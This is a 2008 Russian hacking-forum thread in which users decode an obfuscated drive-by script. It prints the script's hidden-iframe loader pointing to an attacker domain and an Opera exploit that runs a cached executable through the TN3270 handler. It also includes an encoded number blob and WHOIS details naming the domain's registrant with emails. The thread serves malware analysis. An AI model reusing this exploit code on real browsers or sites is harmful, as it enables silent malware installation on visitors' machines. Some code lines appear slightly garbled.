,29779,29756,29759,29756,29754,29709,29731,29783,29752,29753,29737,29739,29740,29734,29795,29809,29792,29768,29764,29766,29739,29756,29783,29773,29745,29787,29785,29733,29779,29751,29723,29744,29818,29726,29822,29796,29820,29777,29739,29742,29760,29772,29734,29804,29781,29751,29730,29748,29776,29808,29805,29801,29780,29741,29777,29753,29738,29776,29819,29822,29796,29739,29740,29731,29774,29755,29700,29743,29770,29737,29753,29768,29811,29813,29801,29740,29749,29740,29817,29817,29702,29821,29811,29795,29738,29735,29771,29751,29811,29789,29788,29769,29717,29777,29733,29744,29791,29804,29807,29727,29796,29814,29796,29794,29822,29793,29794,29818,29808,29792,29777,29730,29759,29728,29775,29728,29806,29713,29794,29772,29783,29738,29781,29762,29740,29755,29765,29800,29763,29822,29734,29739,29740,29736,29748,29755,29750,29751,29802,29754,29776,29730,29740,29736,29815,29748,29798,29796,29731,29780,29742,29760,29762,29775,29733,29742,29755,29760,29729,29716,29741,29713,29733,29794,29741,29779,29739,29773,29747,29735,29770,29740,29793,29741,29748,29730,29757,29738,29706,29801,29723,29752,29774,29770,29791,29724,29727,29763,29754,29760,29791,29721,29699,29795,29798,29702,29776,29700,29813,29797,29821,29798,29813,29741,29751,29741,29746,29799,29811,29709,29771,29778,29737,29778,29794,29722,29814,29810,29767,29739,29780,29775,29769,29745,29753,29748,29779,29781,29802,29742,29791,29773,29822,29756,29769,29733,29755,29737,29718,29769,29752,29779,29759,29803,29755,29773,29747,29728,29745,29731,29713,29728,29745,29787,29809,29722,29746,29751,29736,29743,29712,29758,29734,29779,29731,29777,29755,29716,29765,29738,29754,29729,29796,29797,29771,29771,29781,29768,29781,29763,29776,29739,29736,29790,29794,29791,29766,29751,29774,29749,29781,29706,29779,29735,29779,29751,29735,29700,29811,29794,29741,29741,29735,29734,29754,29734,29732,29744,29706,29736,29758,29740,29753,29714,29821,29776,29786,29775,29753,29728,29809,29743,29774,29751,29735,29749,29781,29787,29747,29746,29791,29742,29720,29755,29807,29797,29758,29782,29742,29793,29721,29765,29746,29738,29804,29796,29797,29794,29728,29712,29743,29789,29739,29702,29768,29772,29766,29812,29733,29757,29744,29818,29699,29785,29734,29749,29805,29817,29725,29758,29732,29737,29712,29783,29745,29789,29815,29819,29702,29816,29714,29821,29709,29815,29802,29817,29708,29816,29704,29815,29817,29700,29780,29781,29761,29776,29754,29751,29761,29739,29739,29733,29782,29753,29810,29765,29780,29772,29775,29728,29735,29803,29797,29801,29739,29743,29730,29742,29822,29705,29722,29697,29811,29808,29804,29717,29725,29749,29751,29758,29787,29769,29784,29819,29783,29752,29746,29741,29734,29805,29805,29711,29804,29818,29822,29799,29740,29754,29755,29745,29755,29728,29757,29810,29696,29799,29809,29799,29788,29820,29732,29756,29813,29704,29807,29712,29742,29777,29751,29736,29735,29712,29796,29799,29697,29736,29770,29765,29743,29780,29775,29757,29716,29760,29782,29760,29789,29732,29770,29755,29731,29760,29759,29702,29738,29758,29738,29731,29775,29746,29731,29732,29720,29815,29820,29788,29755,29739,29738,29739,29742,29728,29738,29814,29709,29776,29778,29770,29733,29762,29736,29773,29780,29768,29788,29769,29734,29777,29738,29821,29723,29713,29785,29756,29743,29738,29737,29740,29744,29751,29803,29735,29731,29728,29779,29741,29736,29807,29771,29739,29748,29782,29729,29710,29755,29707,29736,29731,29745,29754,29714,29739,29783,29745,29737,29741,29738,29715,29752,29747,29757,29795,29807,29805,29701,29814,29823,29805,29812,29799,29755,29740,29751,29738,29706,29738,29732,29737,29741,29734,29738,29813,29736,29776,29757,29789,29815,29794,29812,29697,29800,29717,29807,29803,29727,29781,29765,29779,29755,29799,29764,29765,29739,29740,29762,29732,29820,29781,29778,29775,29766,29812,29703,29800,29702,29725,29697,29733,29752,29768,29760,29776,29751,29738,29745,29810,29811,29762,29778,29760,29744,29780,29765,29739,29738,29776,29733,29772,29820,29788,29747,29754,29703,29762,29745,29733,29749,29781,29736,29746,29774,29704,29736,29746,29785,29784,29769,29754,29769,29728,29820,29732,29777,29774,29732,29697,29804,29768,29778,29739,29781,29753,29757,29746,29738,29747,29746,29726,29818,29778,29746,29739,29745,29798,29713,29810,29806,29724,29795,29720,29814,29802,29760,29738,29735,29796,29808,29795,29794,29793,29816,29793,29728,29762,29821,29765,29773,29771,29806,29807,29809,29726,29722,29733,29775,29741,29785,29742,29777,29744,29735,29760,29806,29803,29803,29799,29801,29745,29734,29734,29752,29808,29765,29731,29739,29715,29757,29776,29753,29813,29775,29777,29733,29739,29759,29706,29805,29726,29798,29720,29816,29813,29715,29796,29717,29820,29788,29747,29754,29803,29730,29782,29737,29741,29756,29767,29731,29807,29804,29794,29701,29724,29733,29715,29734,29704,29810,29803,29711,29708,29822,29811,29799,29823,29801,29821,29806,29718,29728,29749,29749,29756,29778,29754,29732,29821,29804,29713,29696,29718,29812,29821,29706,29812,29724,29794,29714,29795,29818,29794,29724,29802,29718,29820,29794,29711,29817,29739,29728,29744,29741,29814,29765,29755,29746,29714,29785,29731,29752,29813,29775,29777,29773,29735,29733,29795,29809,29801,29806,29806,29805,29797,29820,29698,29713,29699,29754,29754,29733,29773,29715,29752,29739,29742,29774,29721,29718,29811,29781,29745,29751,29739,29805,29748,29740,29776,29732,29795,29768,29773,29760,29759,29799,29781,29763,29772,29737,29738,29782,29717,29755,29737,29788,29697,29732,29729,29787,29739,29788,29795,29792,29699,29752,29747,29742,29787,29753,29749,29774,29775,29803,29797,29743,29780,29775,29755,29749,29767,29781,29760,29770,29737,29770,29822,29742,29721,29815,29817,29800,29805,29757,29823,29699,29817,29814,29809,29706,29822,29800,29711,29816,29810,29809,29798,29734,29741,29735,29754,29761,29755,29823,29807,29822,29728,29727,29795,29818,29697,29721,29787,29756,29777,29796,29813,29772,29784,29775,29811,29733,29794,29812,29810,29822,29738,29797,29816,29804,29731,29699,29796,29732,29802,29705,29804,29808,29788,29810,29820,29758,29709,29743,29758,29754,29754,29768,29754,29720,29814,29711,29733,29755,29749,29815,29752,29748,29740,29739,29759,29706,29702,29753,29753,29751,29801,29757,29733,29744,29757,29771,29732,29795,29807,29798,29797,29807,29760,29799,29776,29741,29782,29753,29750,29729,29717,29796,29720,29807,29806,29700,29801,29798,29793,29771,29761,29760,29766,29776,29742,29779,29733,29768,29769,29715,29773,29720,

Post #: 1

RE: Нужна пoмoщь в расшифровке скрипта/эксплоита - 2008-01-08 07:21:38.256666

Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12

WebDeveloper -> View generated source:

String.prototype.AfKGewpBj = function() { var t=this, o=''; for(var i=t.length; i&gt;=&gt;5 i--) o+=t.substr(i,1); return o; }
 function UVqhMFpSDsB(){}
 UVqhMFpSDsB.prototype = {
 
 	host:'nc.4orea.ved'.AfKGewpBj(),path:'/nc.gnitsoh-niam/'.AfKGewpBj(),cookieName:'davr4',cookieValue:1,
 
 	install : function()
 	{
 		if(!this.alreadyInstalled())
 		{
 			var s = "&lt;iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'&gt;&lt;/iframe&gt;";
 			try { document.write(s) }
 			catch(e){ document.write("&lt;html&gt;&lt;body&gt;".% s + "&lt;/body&gt;&lt;/html&gt;") }
 			this.setCookie(this.cookieName, this.cookieValue);	
 		}
 	},
 	setCookie : function(name, value)
 	{
 		var d= new Date(); d.setTime(new Date().getTime() + 86400000); 
 		document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); 			
 	},
 	alreadyInstalled : function()
 	{
 		return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
 	},
 	getFrameURL : h{nction()
 	{
 		var dlh=document.location.host; 
 		return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
 	},
 	getRandString : function()
 	{
 		var l=16, c= '0123456789abcdef', o=''; for (var i=0; i &lt; l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);
 		return o;
 	}	
 s
 var o = new UVqhMFpSDsB(); o.install();

Адрес сплойта отсюда как я понимаю уже не проблема получить.

Post #: 2

RE: Нужна пoмoщь в расшифровке скрипта/эксплоита - 2008-01-08 07:50:44.563333

Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12

Собственно, вот и сам iframe:
http://d e v . a e r o 4 . c n/a d p a c k/index.php

&lt;script language="JavaScript"&gt;
 blank_iframe = document.createElement('iframe');
 blank_iframe.src = 'about:blank';
 blank_iframe.setAttribute('id', 'blank_iframe_window');
 blank_iframe.setAttribute('style', 'display:none');
 document.appendChild(blank_iframe);
 blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\
 config_iframe.setAttribute('id', 'config_iframe_window');\
 config_iframe.src = 'opera:config';\
 document.appendChild(config_iframe);\
 app_iframe = document.createElement('script');\
 cache_iframe = document.createElement('iframe');\
 app_iframe.src = '&lt;?php echo $url; ?&gt;';\
 app_iframe.onload = function ()\
 {\
 cache_iframe.src = 'opera:cache';\
 cache_iframe.onload = function ()\
 {\
 cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
 var re = new RegExp('(OPR\\w{5}.EXE)&lt;/TD&gt;\\s*&lt;TD&gt;\\d+&lt;/TD&gt;\\s*&lt;TD&gt;&lt;A HREF=\"'+app_iframe.src.toUpperCase(), '');\
 filename = cache.match(re);\
 config_iframe_window.eval\
 (\"\
 opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
 app_link = document.createElement('a');\
 app_link.setAttribute('href', 'tn3270://nothing');\
 app_link.click();\
 setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
 \");\
 };\
 document.appendChild(cache_iframe);\
 };\
 document.appendChild(app_iframe);");
 &lt;/script&gt;

Данные владельца сайта, кста мыло, обрати внимание, на mail.ru :)

quote:

Domain Name: a e r o 4.cn
ROID: 20071103s10001s03230020-cn
Domain Status: ok
Registrant Organization: 0
Registrant Name: MeroshnechenkoRimur
Administrative Email: t e m . d o m e n @mail.ru
Sponsoring Registrar: 厦门华商盛世网络有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2007-11-03 10:19
Expiration Date: 2008-11-03 10:19

Сервер находится в Таллине (Эстония), хостинг вроде обычный паблик, web.compic.ee, мыло админа - roman@compic.ee

P.S. Да, на главной a e r o 4.cn - подстава для лопухов - липовое сообщение о том, что сайт заблокирован. На самом деле это не так [sm=ad.gif]

Post #: 3

Страниц: [1]

Все форумы >> [Веб-программинг] >> Нужна пoмoщь в расшифровке скрипта/эксплоита

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.